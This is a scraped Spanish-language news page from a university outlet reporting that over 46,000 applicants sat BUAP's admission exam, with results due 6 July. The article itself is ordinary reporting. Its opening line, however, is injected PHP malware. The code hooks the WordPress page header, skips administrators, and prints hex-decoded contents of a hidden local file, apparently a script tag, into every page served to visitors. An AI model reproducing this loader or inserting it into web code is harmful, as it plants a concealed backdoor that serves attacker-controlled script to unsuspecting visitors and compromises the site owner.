if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Más de 46 mil jóvenes presentaron el examen de Admisión a la BUAP – La Opinión Universitaria La Opinión Universitaria
Menu

Más de 46 mil jóvenes presentaron el examen de Admisión a la BUAP

  • Los resultados serán entregados el 6 de julio
    Por Diego Cuautle

    Un total de 46 mil 467 aspirantes realizaron el examen de admisión a la Benemérita Universidad Autónoma de Puebla (BUAP) para el nivel superior, técnico superior universitario, así como modalidades semiescolarizada y a distancia.

    Desde muy temprano, los miles de jóvenes provenientes de distintos puntos del estado y del resto del país arribaron a cada una de las sedes que se implementaron para la aplicación de las pruebas correspondientes las cuales tuvieron una duración aproximada de 7 horas.

    Durante el recorrido que realizó en la Facultad de Medicina acompañado de la Comisión de Admisión, el rector de la BUAP, Alfonso Esparza Ortiz recordó que se aplicó la Prueba de Aptitud Académica (PAA) y la Prueba por Área de Conocimiento (PAC) en 21 sedes, una en la capital poblana y 20 más en el interior del estado.

    De entre las sedes localizadas fuera de Puebla Capital están Acatzingo, Atlixco, Ciudad Serdán, Chiautla de Tapia, Chignahuapan, Cuetzalan, Huauchinango, Izúcar de Matamoros, Libres, Los Reyes de Juárez, San Martín Texmelucan, San José Chiapa y San Salvador el Seco Tecamachalco, Tehuacán, Tetela de Ocampo, Teziutlán, Zacapoaxtla, Zacatlán y Tlatlauquitepec.

    En este sentido, comentó que para este año se tuvo un incremento del 11 por ciento en la matricula con respecto al año anterior por lo que serán 2 mil 300 lugares más en comparación al 2018, “la oferta total que hizo la BUAP este año para nuevo ingreso en los niveles medio superior y superior es de 31 mil alumnos, con un incremento del 11 por ciento con respecto”.

    “Este año tenemos un incremento en la matrícula del 11 por ciento; son 2 mil 300 alumnos más con respecto al año pasado; se dice fácil, pero hay universidades que tienen ese número en total. Nosotros ya rebasamos los cien mil alumnos; es una capacidad
    instalada muy amplia y muy eficiente”, comentó en entrevista.

    Indicó que antes de iniciar su administración, el promedio de estudiantes rondaba los 50
    mil y “en casi cinco años ya hemos duplicado esa cifra en capacidad de matrícula y en
    oferta; por supuesto creció mucho la presencia al interior del estado y se sigue creciendo”.

Agregó que de entre las licenciaturas más demandadas son Medicina, Derecho, Arquitectura, Químico Farmacobiólogo, Mecatrónica, Contaduría Pública, Fisioterapia, Ingeniería Civil, Ingeniería Industrial, Administración de Empresas y Comunicación.

“Es la única forma –presentar el examen de admisión- que tenemos para poder seleccionar y darles oportunidad a los lugares que dispone la Institución… se aplicó a 33 aspirantes mexicanos con estudios en el extranjero; también el registro de 12 extranjeros, y que se presentaron 33 aspirantes con discapacidad”, dijo.

Cabe señalar que será hasta el próximo 6 de julio que se den a conocer los resultados en la página www.resultados.buap.mx, y la posterior inscripción de los 31 mil estudiantes que ingresarán en 2019 a los niveles medio superior, superior y técnico.

  • No comments

    Deja una respuesta

    Tweets recientes